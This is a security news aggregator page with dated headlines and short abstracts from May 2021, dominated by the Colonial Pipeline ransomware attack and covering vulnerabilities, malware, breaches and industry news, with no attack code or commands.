Abstract Facebook asked to drop plans to create an Instagram for children under the age of 13

Infosecurity Magazine

May 11, 2021 – Breach

Cycode raises $20M to secure DevOps pipelines Full Text

Abstract Israeli security startup Cycode, which specializes in securing the DevOps pipeline, today announced that it has raised a $20 million Series A funding round led by Insight Partners.

TechCrunch

May 11, 2021 – Solution

Microsoft Defender ATP now secures networked Linux, macOS devices Full Text

Abstract Microsoft has added support for identifying and assessing the security configurations of Linux and macOS endpoints on enterprise networks using Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection).

BleepingComputer

May 11, 2021 – Vulnerabilities

Adobe fixes Reader zero-day vulnerability exploited in the wild Full Text

Abstract Adobe has released a massive Patch Tuesday security update release that fixes vulnerabilities in twelve different applications, including one actively exploited vulnerability Adobe Reader.

BleepingComputer

May 11, 2021 – Vulnerabilities

Apple Execs Chose to Keep a Hack of 128 Million iPhones Quiet Full Text

Abstract The infections were the result of legitimate developers writing apps using a counterfeit and malicious copy of Xcode, Apple’s iOS and OS X app development tool, dubbed XcodeGhost.

Wired

May 11, 2021 – APT

10 APT groups that joined the MS Exchange exploitation party Full Text

Abstract Research by ESET showed that the vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 were exploited by at least 10 APT groups since the release of the patches.

Cyber News

May 11, 2021 – Ransomware

Is It Really 85 Percent? Full Text

Abstract A commonly cited statistic about private ownership of U.S. infrastructure has popped up again after the Colonial Pipeline ransomware report. But where does it actually come from?

Lawfare

May 11, 2021 – Vulnerabilities

Siemens Addresses 60 Vulnerabilities Introduced by Third-Party Components Full Text

Abstract Of the 14 advisories published this week, nine cover 60 vulnerabilities related to third-party components. The remaining advisories cover only 7 flaws that are specific to Siemens products.

Security Week

May 11, 2021 – Malware

Apple was aware that XcodeGhost impacted 128 Million iOS Users in 2015 Full Text

Abstract Court documents revealed that the infamous XcodeGhost malware, which has been active since 2015, infected 128 million iOS users. Documents provided in a court case that sees Epic Games v. Apple Inc. revealed that the XcodeGhost malware impacted...

Security Affairs

May 11, 2021 – Ransomware

WATCH: FBI cyber division chief details how his team will support businesses in the ransomware battle Full Text

Abstract As Colonial Pipeline struggles to return to operations amid a crippling ransomware attack, how will law enforcement leverage tech, partnership with industry, and policy to manage the threat? During a recent SC Media eSummit on ransomware, Herb Stapleton, cyber division section chief at the FBI, offered details on lessons that emerged during 2020, and how they will shape efforts in 2021 to respond to attacks.

SCMagazine

May 11, 2021 – Government

#CYBERUK21: Home Secretary Outlines UK Government’s Plan to Tackle Growing Cyber-Threats Full Text

Abstract UK Home Secretary, Priti Patel, speaks during CYBERUK 2021

Infosecurity Magazine

May 11, 2021 – Ransomware

200K Veterans’ Medical Records Likely Stolen by Ransomware Gang Full Text

Abstract Analyst finds ransomware evidence, despite a contractor’s denial of compromise.

Threatpost

May 11, 2021 – Ransomware

Ransomware gang leaks data from Metropolitan Police Department Full Text

Abstract Babuk ransomware operators have leaked what they claim are personal files belongin to police officers from the Metropolitan Police Department after negotiations went stale.

BleepingComputer

May 11, 2021 – Breach

University of California Confirms Theft of Personal Information in Cyberattack Involving Accellion FTA Service Full Text

Abstract The University of California (UC) this week confirmed that personal information was stolen in a cyberattack involving the Accellion File Transfer Appliance (FTA) service.

Security Week

May 11, 2021 – Business

Fraud prevention firm Arkose Labs raises $70M Full Text

Abstract Arkose Labs, a startup developing a platform to detect and mitigate online fraud, today announced that it raised $70 million in a funding round led by SoftBank Vision Fund 2.

Venture Beat

May 11, 2021 – Ransomware

DarkSide Wanted Money, Not Disruption from Colonial Pipeline Attack Full Text

Abstract Statement by the ransomware gang suggests that the incident that crippled a major U.S. oil pipeline may not have exactly gone to plan for overseas threat actors.

Threatpost

May 11, 2021 – Vulnerabilities

Compsci boffin publishes proof-of-concept code for 54-year-old zero-day in Universal Turing Machine Full Text

Abstract A computer science professor from Sweden has discovered an arbitrary code execution vulnerability in the Universal Turing Machine, one of the earliest computer designs in history.

The Register

May 11, 2021 – Government

White House monitoring fuel supply shortages in southeastern US from pipeline cyberattack Full Text

Abstract The Biden administration is monitoring fuel supply shortages in the southeastern United States after the Colonial Pipeline ransomware attack, the White House said in a statement late Monday.

The Hill

May 11, 2021 – General

LIVE Webinar — The Rabbit Hole of Automation Full Text

Abstract The concept of automation has taken on a life of its own in recent years. The idea is nothing new, but the current interest in automation is a mix of both hype and innovation. On the one hand, it's much easier today to automate everything from small processes to massive-scale tasks than it's ever been before. On the other hand, are we really prepared to hand the reins over to completely automated systems, and should we? There are areas in security operations where automation is already a critical component. In terms of analytics and parsing through ever-expanding data flows, it's impossible for most teams to keep up without impacting other areas of their jobs. Automated systems help us make sense of threats much faster and more reliably. However, automation isn't a cure-all (just yet). A new live webinar from XDR provider Cynet dives into the topic more in depth ( register here ). The webinar explores automation as it exists today in the cybersecurity industry. Led

The Hacker News

May 11, 2021 – General

#CYBERUK21: We Have Reached a Moment of Reckoning in Cybersecurity, Says GCHQ Director Full Text

Abstract Collaboration and diversity are needed to tackle the tech challenges

Infosecurity Magazine

May 11, 2021 – Solution

Google open sources cosign tool for verifying containers Full Text

Abstract Google has released a new open-source tool called cosign that could allow administrators to sign and verify the container images. Google has released a new open-source tool called cosign that allows to sign, verify container images, it was developed...

Security Affairs

May 11, 2021 – Vulnerabilities

Vulnerability attacks weakness in Microsoft Azure virtual machine extensions Full Text

Abstract The flaw, which Microsoft patched in March, would allow an attacker to escalate privileges and access sensitive user data.

SCMagazine

May 11, 2021 – Vulnerabilities

Researchers Pawn Electric Cars to Circumvent Payment for Charging Stations and Manipulate Car Battery Full Text

Abstract Tencent's Blade Team, a security research group, showed they could circumvent payment schemes at electric vehicle charging stations by using a Raspberry Pi to conduct the attack.

The Register

May 11, 2021 – 5G

U.S Intelligence Agencies Warn About 5G Network Weaknesses Full Text

Abstract Inadequate implementation of telecom standards, supply chain threats, and weaknesses in systems architecture could pose major cybersecurity risks to 5G networks, potentially making them a lucrative target for cybercriminals and nation-state adversaries to exploit for valuable intelligence. The analysis, which aims to identify and assess risks and vulnerabilities introduced by 5G adoption, was published on Monday by the U.S. National Security Agency (NSA), in partnership with the Office of the Director of National Intelligence (ODNI) and the Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA). "As new 5G policies and standards are released, there remains the potential for threats that impact the end-user," the report  said . "For example, nation states may attempt to exert undue influence on standards that benefit their proprietary technologies and limit customers' choices to use other equipment or software." S

The Hacker News

May 11, 2021 – General

Amazon: We Blocked 10 Billion Bad Listings in 2020 Full Text

Abstract Retail giant reveals major counterfeit threat in new report

Infosecurity Magazine

May 11, 2021 – Ransomware

FBI and Australia ACSC agencies warn of ongoing Avaddon ransomware attacks Full Text

Abstract The FBI and Australian Australian Cyber Security Centre (ACSC) warn of an ongoing Avaddon ransomware campaign targeting organizations worldwide. The Federal Bureau of Investigation (FBI) and the Australian Cyber Security Centre (ACSC) are warning...

Security Affairs

May 11, 2021 – Privacy

Twitter’s New Tip Jar Feature has Some Privacy Issues Full Text

Abstract As Rachel Tobac of SocialProof Security highlighted in a tweet, if a user sends another a tip via PayPal, the receiver can find out the sender's address by opening the receipt from the tip received.

Softpedia

May 11, 2021 – Malware

Experts warn of a new Android banking trojan stealing users’ credentials Full Text

Abstract Cybersecurity researchers on Monday disclosed a new Android trojan that hijacks users' credentials and SMS messages to facilitate fraudulent activities against banks in Spain, Germany, Italy, Belgium, and the Netherlands. Called " TeaBot " (or Anatsa), the malware is said to be in its early stages of development, with malicious attacks targeting financial apps commencing in late March 2021, followed by a rash of infections in the first week of May against Belgium and Netherlands banks. The first signs of TeaBot activity emerged in January. "The main goal of TeaBot is stealing victim's credentials and SMS messages for enabling frauds scenarios against a predefined list of banks," Italian cybersecurity, and online fraud prevention firm Cleafy said in a Monday write-up. "Once TeaBot is successfully installed in the victim's device, attackers can obtain a live streaming of the device screen (on demand) and also interact with it via Accessibility Ser

The Hacker News

May 11, 2021 – Ransomware

AXA to Stop Reimbursing Ransom Payments Full Text

Abstract Insurer's move in France could drive cybersecurity improvements

Infosecurity Magazine

May 11, 2021 – Ransomware

Biden: No evidence Russian government is involved in Colonial ransomware attack Full Text

Abstract At a press conference today, President Joe Biden said the US intelligence community has no evidence that the Russian government had any kind of involvement in the Colonial Pipeline hack.

The Record

May 11, 2021 – Government

U.S. Declares Emergency in 17 States Over Fuel Pipeline Cyber Attack Full Text

Abstract The ransomware attack  against Colonial Pipeline's networks has prompted the U.S. Federal Motor Carrier Safety Administration (FMCSA) to issue a  regional emergency declaration  in 17 states and the District of Columbia (D.C.). The declaration provides a temporary exemption to Parts 390 through 399 of the Federal Motor Carrier Safety Regulations ( FMCSRs ), allowing alternate transportation of gasoline, diesel, and refined petroleum products to address supply shortages stemming from the attack. "Such [an] emergency is in response to the unanticipated shutdown of the Colonial pipeline system due to network issues that affect the supply of gasoline, diesel, jet fuel, and other refined petroleum products throughout the Affected States," the directive said. "This Declaration addresses the emergency conditions creating a need for immediate transportation of gasoline, diesel, jet fuel, and other refined petroleum products and provides necessary relief." The states

The Hacker News

May 11, 2021 – Ransomware

Japanese Manufacturer Yamabiko Targeted by Babuk Ransomware Full Text

Abstract Report suggests threat actors have already come out of retirement

Infosecurity Magazine

May 11, 2021 – Solution

Google Releases Open Source Tool for Verifying Containers Full Text

Abstract Developed in collaboration with Linux Foundation’s sigstore project, the technology company said the motivation for cosign is “to make signatures invisible infrastructure.”

Security Week

May 11, 2021 – Business

GitHub shifts away from passwords with security key support for SSH Git operations Full Text

Abstract When you add a security key to SSH operations, you can use these devices to protect you and your account from accidental exposure, account hijacking, or malware, a GitHub security engineer wrote.

ZDNet

May 11, 2021 – Outage

Cyberattack knocks out RPI computer systems Full Text

Abstract Rensselaer Polytechnic Institute is three days into dealing with a cyberattack that shut down much of its network, impacting the university’s students as they go into finals for the spring semester.

Times Union

May 10, 2021 – Government

Colonial Pipeline attack: What government can do to deter critical infrastructure cybercriminals Full Text

Abstract What does the U.S. do about criminals protected by their own governments? That question becomes more complicated with attacks against critical infrastructure, which is privately owned and operated, but also intrinsically tied to national security. Those distinctions make these companies high-value targets, which many argue are in government’s best interest to protect.

SCMagazine

May 10, 2021 – Attack

5 takeaways from attack on Colonial Pipeline Full Text

Abstract The Colonial Pipeline, which transports about 45 percent of fuel consumed on the East Coast, shut down over the weekend due to a ransomware attack.

The Hill

May 10, 2021 – General

Hillicon Valley: Colonial Pipeline attack underscores US energy’s vulnerabilities | Biden leading ‘whole-of-government’ response to hack | Attorneys general urge Facebook to scrap Instagram for kids Full Text

Abstract The nation’s oil and gas sector was left reeling from a ransomware attack late last week that caused Colonial Pipeline to shut down operations that provide around 45 percent of the East Coast’s oil. Officials and experts said Monday that the hack underscored vulnerabilities in the nation’s critical utilities, while the Biden administration launched a “whole-of-government” response to address the crisis. Meanwhile, a group of attorneys general urged Facebook to abandon support for an Instagram for kids platform. 

The Hill

May 10, 2021 – Ransomware

City of Tulsa’s online services disrupted in ransomware incident Full Text

Abstract The City of Tulsa, Oklahoma, has suffered a ransomware attack that forced the City to shut down its systems to prevent the further spread of the malware.

BleepingComputer

May 10, 2021 – Business

CrowdStrike, Google partnership aims to deliver defense-in-depth for hybrid cloud environments Full Text

Abstract CrowdStrike and Google Cloud on Monday announced a series of product integrations to deliver joint customers defense-in-depth security, deeper visibility and workload protection across a hybrid cloud environment. The companies say the integrations will allow for more seamless sharing of telemetry and data between the two security platforms, helping maintain high levels of security across…

SCMagazine

May 10, 2021 – Ransomware

FBI confirmed that Darkside ransomware gang hit Colonial Pipeline Full Text

Abstract The U.S. FBI confirmed that the attack against the Colonial Pipeline over the weekend was launched by the Darkside ransomware gang. The U.S. Federal Bureau of Investigation confirmed that the Colonial Pipeline was shut down due to a cyber attack carried...

Security Affairs

May 10, 2021 – Solution

GitHub now supports security keys when using Git over SSH Full Text

Abstract GitHub has added support for securing SSH Git operations using FIDO2 security keys for added protection from account takeover attempts.

BleepingComputer

May 10, 2021 – Government

Biden leading ‘whole of government’ response to Colonial Pipeline attack Full Text

Abstract President Biden and top administration officials said Monday they are taking a “whole-of-government” approach to both responding to the debilitating ransomware attack on Colonial Pipeline, and to strengthening the security of critical utilities moving forward. 

The Hill

May 10, 2021 – Government

White House: Colonial should be its own ‘first line of defense’ against attacks Full Text

Abstract The White House said that it has been in touch with Colonial since Friday and has offered its assistance mitigating the ransomware, which Colonial has declined. Colonial told the administration it is working with its own cyber team.

SCMagazine

May 10, 2021 – Government

Colonial Pipeline attack spotlights risks of geographically dispersed networks in an industry that is ‘far behind’ Full Text

Abstract One expert noted that the pipeline industry is far behind other sectors, creating a high-risk scenario that can cascade rapidly.

SCMagazine

May 10, 2021 – Ransomware

N3TW0RM Ransomware Targeting Israeli Organizations Full Text

Abstract Iranian hackers recently compromised the networks of H&M Israel and other Israeli firms. It has threatened to leak 110GB of customer data if the ransom requirement of 3BTC isn’t met. N3TW0RM has not been attributed to any group at present.

Cyware Alerts - Hacker News

May 10, 2021 – Policy and Law

Four Confess to ‘Bulletproof Hosting’ Full Text

Abstract Conspirators plead guilty to providing ‘bulletproof hosting’ services to cyber-criminals attacking the US

Infosecurity Magazine

May 10, 2021 – Breach

Data Breach at Law Firm Jones Day Impacts Employee Emails at City of Chicago Full Text

Abstract On Friday, the city of Chicago revealed that some employee emails that were given to Jones Day “as part of an independent inquiry being conducted by the firm” were compromised in the incident.

Security Week

May 10, 2021 – Phishing

Staff Bonus was “Crass” Phishing Simulation Full Text

Abstract "Thank you" email offering bonus to train company employees was a cybersecurity test

Infosecurity Magazine

May 10, 2021 – Phishing

Global BEC Campaign Victimizes Over 120 Organizations via Gift Card Scams Full Text

Abstract In this campaign, attackers targeted a variety of companies in the consumer goods, process manufacturing and agriculture, real estate, discrete manufacturing, and professional services sectors.

Microsoft

May 10, 2021 – Government

White House downplays any supply challenge from pipeline attack Full Text

Abstract The White House said Monday that a cyberattack on Colonial Pipeline, the largest oil supplier in the Northeast United States, has not yet resulted in supply shortages but that officials are monitoring for potential disruptions in the future.

The Hill

May 10, 2021 – Attack

University Cancels Exams After Cyber-Attack Full Text

Abstract America’s oldest technological research university cancels finals following cyber-intrusion

Infosecurity Magazine

May 10, 2021 – Vulnerabilities

AirTag hacked for the first time by security researcher Full Text

Abstract While the regular item tracker opens the Find My website, researchers created a modified item tracker that opens a non-related URL, which could be used for phishing or anything else.

9to5 Mac

May 10, 2021 – Business

Colonial aims to ‘substantially’ restore pipeline operations by end of week Full Text

Abstract The Colonial Pipeline Company said that it hopes to “substantially” restore the operations of its pipeline by the end of the week following a ransomware attack that led to its shutdown. 

The Hill

May 10, 2021 – Ransomware

FBI confirms DarkSide ransomware group behind pipeline hack Full Text

Abstract The FBI confirmed on Monday that criminal ransomware gang Darkside is responsible for the cyberattack on the Colonial Pipeline network.

The Hill

May 10, 2021 – Vulnerabilities

Colonial Pipeline attack underscores US energy’s vulnerability Full Text

Abstract The ransomware attack on Colonial Pipeline, the largest supplier of oil to the Northeast region of the United States, is underscoring just how vulnerable critical U.S. infrastructure is to cybercriminals in a way no previous attack has done, say U.S. officials and experts in the field.

The Hill

May 10, 2021 – Ransomware

US and Australia warn of escalating Avaddon ransomware attacks Full Text

Abstract The Federal Bureau of Investigation (FBI) and the Australian Cyber Security Centre (ACSC) are warning of an ongoing Avaddon ransomware campaign targeting organizations from an extensive array of sectors in the US and worldwide.

BleepingComputer

May 10, 2021 – Ransomware

DarkSide ransomware will now vet targets after pipeline cyberattack Full Text

Abstract The DarkSide ransomware gang posted a new "press release" today stating that they are apolitical and will vet all targets before they are attacked.

BleepingComputer

May 10, 2021 – Ransomware

DarkSide ransomware will start vetting targets after pipeline cyberattack Full Text

Abstract The DarkSide ransomware gang posted a new "press release" today stating that they are apolitical and will vet all targets before they are attacked.

BleepingComputer

May 10, 2021 – Vulnerabilities

Pega Infinity hotfix released after researchers flag critical authentication bypass vulnerability Full Text

Abstract According to the research team – Sam Curry, Justin Rhinehart, Brett Buerhaus, and Maik Robert – CVE-2021-27651 is a critical-risk vulnerability in versions 8.2.1 to 8.5.2 of Pega’s Infinity software.

The Daily Swig

May 10, 2021 – Ransomware

Ransomware gangs get more aggressive against law enforcement Full Text

Abstract Criminal hackers are increasingly using brazen methods to increase pressure on law enforcement agencies to pay ransoms, including threatening to leak highly sensitive information.

AP News

May 10, 2021 – Ransomware

US declares state of emergency after ransomware hits largest pipeline Full Text

Abstract After a ransomware attack on Colonial Pipeline forced the company to shut down 5,500 miles of fuel pipeline, the Federal Motor Carrier Safety Administration (FMCSA) issued a regional emergency declaration affecting 17 states and the District of Columbia.

BleepingComputer

May 10, 2021 – Covid-19

COVID-related Cybercrime in the UK on the Rise Full Text

Abstract More scams were taken down by the UK's cybersecurity agency in the last year compared to the previous three years combined. Coronavirus swindles are fueling the increase.

Softpedia

May 10, 2021 – Privacy

Over 25% Of Tor Exit Relays Spied On Users’ Dark Web Activities Full Text

Abstract An unknown threat actor managed to control more than 27% of the entire Tor network exit capacity in early February 2021, a new study on the dark web infrastructure revealed. "The entity attacking Tor users is actively exploiting tor users since over a year and expanded the scale of their attacks to a new record level," an independent security researcher who goes by the name nusenu  said  in a write-up published on Sunday. "The average exit fraction this entity controlled was above 14% throughout the past 12 months." It's the latest in a series of efforts undertaken to bring to light malicious Tor activity since  December 2019 . The attacks, which are said to have begun in January 2020, were first  documented and exposed  by the same researcher in August 2020. Tor is open-source software for enabling anonymous communication on the Internet. It obfuscates the source and destination of a web request by directing network traffic through a series of relays in or

The Hacker News

May 10, 2021 – General

Malicious UK Website Takedowns Surge 15-Fold in 2020 Full Text

Abstract UK’s Active Cyber Defence program goes from strength-to-strength

Infosecurity Magazine

May 10, 2021 – Ransomware

City of Tulsa, is the last US city hit by ransomware attack Full Text

Abstract The city of Tulsa, Oklahoma, has been hit by a ransomware attack over the weekend that impacted its government’s network and shut down its websites. One of the biggest cities in the US  by population size, the City of Tulsa, was victim of a ransomware...

Security Affairs

May 10, 2021 – Vulnerabilities

NatWest Bank scheduled payments bug may have cost you money Full Text

Abstract Today, UK-based NatWest Bank has alerted multiple customers of a system error that may have caused many more payments to be debited from customer accounts than the originally agreed-upon amount. The issue impacts standing orders set up between 23rd March 2020 and 24th February 2021.

BleepingComputer

May 10, 2021 – Ransomware

Reported ransomware attack leads to weeks of Aprima EHR outages Full Text

Abstract A reported ransomware attack on the CompuGroup Medical data center partner, MedNetwoRX, has impeded some customers' access to their Aprima electronic health record systems for more than two weeks.

Healthcare IT News

May 10, 2021 – General

Is it still a good idea to require users to change their passwords? Full Text

Abstract For as long as corporate IT has been in existence, users have been required to change their passwords periodically. In fact, the need for scheduled password changes may be one of the most long-standing of all IT best practices. Recently, however, things have started to change. Microsoft has reversed course on the best practices that it has had in place for decades and  no longer recommends that organizations require users to change passwords periodically . Organizations are being forced to consider, perhaps for the first time, whether or not requiring periodic password changes is a good idea. Microsoft password reset recommendations According to Microsoft, requiring users to change their passwords frequently does more harm than good.  Humans are notoriously resistant to change. When a user is forced to change their password, they will often come up with a new password that is based on their previous password. A user might, for example, append a number to the end of their password

The Hacker News

May 10, 2021 – Vulnerabilities

UK/US: Patch These 11 Bugs Now to Thwart Russian Spies Full Text

Abstract New report reveals latest SVR tactics

Infosecurity Magazine

May 10, 2021 – Hacker

Threat actors added thousands of Tor exit nodes to carry out SSL stripping attacks Full Text

Abstract Since early 2020, bad actors have added Tor exit nodes to the Tor network to intercep traffic to cryptocurrency-related sites Starting from January 2020, a threat actor has been adding thousands of malicious exit relays to the Tor network to intercept...

Security Affairs

May 10, 2021 – Ransomware

City of Tulsa Hit by Ransomware Attack Over the Weekend Full Text

Abstract The city of Tulsa, Oklahoma, one of the largest cities in the US, has been hit by a ransomware attack over the weekend that affected the city government’s network and brought down official websites.

The Record

May 10, 2021 – Ransomware

Ransomware Takes Down East Coast Fuel Pipeline Full Text

Abstract Emergency legislation issued after critical infrastructure attack

Infosecurity Magazine

May 10, 2021 – Privacy

WhatsApp will not deactivate accounts for not accepting new privacy terms Full Text

Abstract WhatsApp will not deactivate the accounts of users who don't accept the new privacy policy update that requires sharing data with other companies owned by Facebook. WhatsApp on Friday announced that it will not deactivate accounts of users who don't...

Security Affairs

May 10, 2021 – Government

US Government Passes Emergency Waiver Over Disruptive Cyberattack at Largest Fuel Pipeline Full Text

Abstract Multiple sources have confirmed that the ransomware attack was caused by a cyber-criminal gang called DarkSide, who infiltrated Colonial's network on Thursday and took almost 100GB of data hostage.

BBC

May 10, 2021 – Phishing

Scammers Score $2 Million from WallStreetBets Forum Users Full Text

Abstract A cryptocurrency scam recently pilfered at least $2 million from WallStreetBets enthusiasts, convincing them that they were buying into a new crypto coin connected to the popular memestock.

Gizmodo

May 10, 2021 – Vulnerabilities

Foxit Patches Vulnerability Allowing Attackers to Execute Malware Via PDF Files Full Text

Abstract Successful exploitation of this vulnerability can lead from program crashes and data corruption to the execution of arbitrary code on computers running the vulnerable software.

Heimdal Security

May 10, 2021 – Vulnerabilities

Lemon Duck spreads its wings: Actors target Microsoft Exchange servers, incorporate new TTPs Full Text

Abstract Lemon Duck remains relevant as the operators begin to target Microsoft Exchange servers, exploiting high-profile security vulnerabilities to drop web shells and carry out malicious activities.

Cisco Talos

May 10, 2021 – Deepfake

DefakeHop: A deepfake detection method that tackles adversarial threat detection and recognition Full Text

Abstract US Army researchers developed a deepfake detection method that will enable the creation of soldier technology to support mission-essential tasks such as adversarial threat detection and recognition.

Help Net Security

May 09, 2021 – Policy and Law

Four Plead Guilty to Aiding Cyber Criminals with Bulletproof Hosting Full Text

Abstract Four Eastern European nationals face 20 years in prison for Racketeer Influenced Corrupt Organization (RICO) charges after pleading guilty to providing bulletproof hosting services between 2008 and 2015, which were used by cybercriminals to distribute malware to financial entities across the U.S. The individuals, Aleksandr Grichishkin, 34, and Andrei Skvortsov, 34, of Russia; Aleksandr Skorodumov, 33, of Lithuania; and Pavel Stassi, 30, of Estonia, have been accused of renting their wares to cybercriminal clients, who used the infrastructure to disseminate malware such as Zeus, SpyEye, Citadel, and the Blackhole Exploit Kit that were capable of co-opting victim machines into a botnet, and stealing sensitive information. The deployment of malware caused or attempted to cause millions of dollars in losses to U.S. victims, the U.S. Department of Justice (DoJ) said in a statement on Friday. "A key service provided by the defendants was helping their clients to evade detection by

The Hacker News

May 9, 2021 – Ransomware

CISA MAR report provides technical details of FiveHands Ransomware Full Text

Abstract U.S. CISA has published an analysis of the FiveHands ransomware, the same malware that was analyzed a few days ago by researchers from FireEye’s Mandiant experts. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published an analysis...

Security Affairs

May 9, 2021 – Vulnerabilities

SQL injection issue in Anti-Spam WordPress Plugin exposes User Data Full Text

Abstract ‘Spam protection, AntiSpam, FireWall by CleanTalk’ anti-spam WordPress plugin could expose user sensitive data to an unauthenticated attacker. A Time-Based Blind SQL Injection in ‘Spam protection, AntiSpam, FireWall by CleanTalk’ WordPress...

Security Affairs

May 09, 2021 – Outage

Ransomware Cyber Attack Forced the Largest U.S. Fuel Pipeline to Shut Down Full Text

Abstract Colonial Pipeline , which carries 45% of the fuel consumed on the U.S. East Coast, on Saturday said it halted operations due to a ransomware attack,  once again demonstrating  how infrastructure is vulnerable to cyberattacks. "On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack," the company  said  in a statement posted on its website. "We have since determined that this incident involves ransomware. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems." Colonial Pipeline is the largest refined products pipeline in the U.S., a 5,500 mile (8,851 km) system involved in transporting over 100 million gallons from the Texas city of Houston to New York Harbor. Cybersecurity firm FireEye's Mandiant incident response division is said to be assisting with the investigation, according to reports from  Bloomberg

The Hacker News

May 9, 2021 – General

Security Affairs newsletter Round 313 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Cloud hosting provider Swiss Cloud suffered a ransomware attackHacking a Tesla Model X with a DJI Mavic...

Security Affairs

May 9, 2021 – Denial Of Service

TsuNAME flaw exposes DNS servers to DDoS attacks Full Text

Abstract A flaw in some DNS resolvers, tracked as TsuNAME, can allow attackers to launch DDoS attacks against authoritative DNS servers. Researchers at SIDN Labs (the R&D team of the registry for .nl domains), InternetNZ (the registry for .nz domains),...

Security Affairs

May 08, 2021 – Phishing

Twitter scammers impersonate SNL in Elon Musk cryptocurrency scams Full Text

Abstract Twitter scammers are jumping on Elon Musk's hosting of Saturday Night Live to push cryptocurrency scams to steal people's Bitcoin, Ethereum, and Dogecoin.

BleepingComputer

May 8, 2021 – Outage

Cyberattack Forces Colonial Pipeline to Shut Major Fuel Line Full Text

Abstract A cyberattack forced the shutdown of one of the largest pipelines in the United States, in what appeared to be a significant attempt to disrupt vulnerable energy infrastructure.

New York Times

May 08, 2021 – Outage

Major US pipeline halts operations after cyberattack Full Text

Abstract One of the largest pipelines in the U.S. was forced to halt some of its operations Friday after a crippling cyberattack on its energy infrastructure.

The Hill

May 8, 2021 – Ransomware

Major U.S. Pipeline Crippled in Ransomware Attack Full Text

Abstract Colonial Pipeline Company says it is the victim of a cyberattack that forced the major provider of liquid fuels to the East Coast to temporarily halted all pipeline operations.

Threatpost

May 08, 2021 – Accident

Largest U.S. pipeline shuts down operations after ransomware attack Full Text

Abstract Colonial Pipeline, the largest fuel pipeline in the United States, has shut down operations after suffering what is reported to be a ransomware attack.

BleepingComputer

May 08, 2021 – Privacy

Facebook Will Limit Your WhatsApp Features For Not Accepting Privacy Policy Full Text

Abstract WhatsApp on Friday disclosed that it won't deactivate accounts of users who don't accept its  new privacy policy  rolling out on May 15, adding it will continue to keep reminding them to accept the new terms. "No one will have their accounts deleted or lose functionality of WhatsApp on May 15 because of this update," the Facebook-owned messaging service  said  in a statement. The move marks a turnaround from its previous stance earlier this year when the company outlined plans to make the accounts inaccessible completely should users choose not to comply with the data-sharing agreement and opt not to have their WhatsApp account information shared with Facebook. "If you haven't accepted by [May 15], WhatsApp will not delete your account. However, you won't have full functionality of WhatsApp until you accept," the company had  previously said . "For a short time, you'll be able to receive calls and notifications, but won't be able to

The Hacker News

May 08, 2021 – Breach

Ransomware gangs have leaked the stolen data of 2,100 companies so far Full Text

Abstract Since 2019, ransomware gangs have leaked the stolen data for 2,103 companies on dark web data leaks sites.

BleepingComputer

May 8, 2021 – Outage

A cyberattack shutdown US Colonial Pipeline Full Text

Abstract A cyberattack forced the shutdown of one of the largest pipelines in the United States, the Colonial Pipeline facility in Pelham, Alabama. The Colonial Pipeline facility in Pelham, Alabama was hit by a cybersecurity attack, its operators were forced...

Security Affairs

May 8, 2021 – Phishing

Microsoft warns of a large-scale BEC campaign to make gift card scam Full Text

Abstract Microsoft is warning of a large-scale BEC campaign that targeted hundreds of organizations leveraging typo-squatted domains registered days before the attacks. Business email compromise (BEC) attacks represent a serious threat for organizations worldwide,...

Security Affairs

May 08, 2021 – Vulnerabilities

Top 11 Security Flaws Russian Spy Hackers Are Exploiting in the Wild Full Text

Abstract Cyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous public disclosures of their attack methods, according to a  new advisory  jointly published by intelligence agencies from the U.K. and U.S. Friday. "SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders," the National Cyber Security Centre (NCSC)  said . These include the deployment of an open-source tool called  Sliver  to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities. The development followed the  public attribution  of SVR-linked actors to the  SolarWinds  supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.

The Hacker News

May 8, 2021 – Government

US spy agencies review software suppliers’ ties to Russia following SolarWinds hack Full Text

Abstract U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors, a top Justice Department official said.

Cyberscoop

May 8, 2021 – APT

Russian cyber-spies changed tactics after the UK and US outed their techniques – so here’s a list of those changes Full Text

Abstract Russian spies from APT29 responded to Western agencies outing their tactics by adopting a red-teaming tool to blend into targets' networks as a legitimate pentesting exercise.

The Register

May 8, 2021 – Ransomware

CaptureRx Hit with Ransomware Attack Full Text

Abstract An investigation revealed that certain files were accessed without permission, including first and last names, dates of birth, prescription information, and medical record numbers.

Heimdal Security

May 8, 2021 – Breach

19 petabytes of data exposed across 29,000+ unprotected databases Full Text

Abstract CyberNews researchers found more than 29,000 unprotected databases worldwide that are still publicly accessible, leaving close to 19,000 terabytes of data exposed to anyone, including threat actors.

Security Affairs

May 8, 2021 – Vulnerabilities

Popular routers found vulnerable to hacker attacks Full Text

Abstract The main issues affecting routers supplied by ISPs such as Virgin, EE, Sky, TalkTalk, and Vodafone were weak default passwords, local network vulnerabilities, and the lack of firmware updates to patch security loopholes.

ESET Security

May 8, 2021 – Vulnerabilities

VMware Patches Critical Flaw Reported by Sanctioned Russian Security Firm Full Text

Abstract VMware has patched another critical vulnerability reported by Positive Technologies, a Russian cybersecurity firm that was sanctioned recently by the United States of America.

Security Week

May 8, 2021 – Vulnerabilities

Russian hackers are targeting these vulnerabilities, so patch now Full Text

Abstract Russian cyberattacks are being deployed with new techniques - including exploiting vulnerabilities like the recent Microsoft Exchange zero-days - as its hackers continue to target governments, organizations, and energy providers around the world.

ZDNet

May 07, 2021 – Ransomware

The Week in Ransomware - May 7th 2021 - Attacking healthcare Full Text

Abstract While ransomware attacks continued throughout the week, for the most part, it has been quieter than usual, with only a few new variants released.

BleepingComputer

May 07, 2021 – General

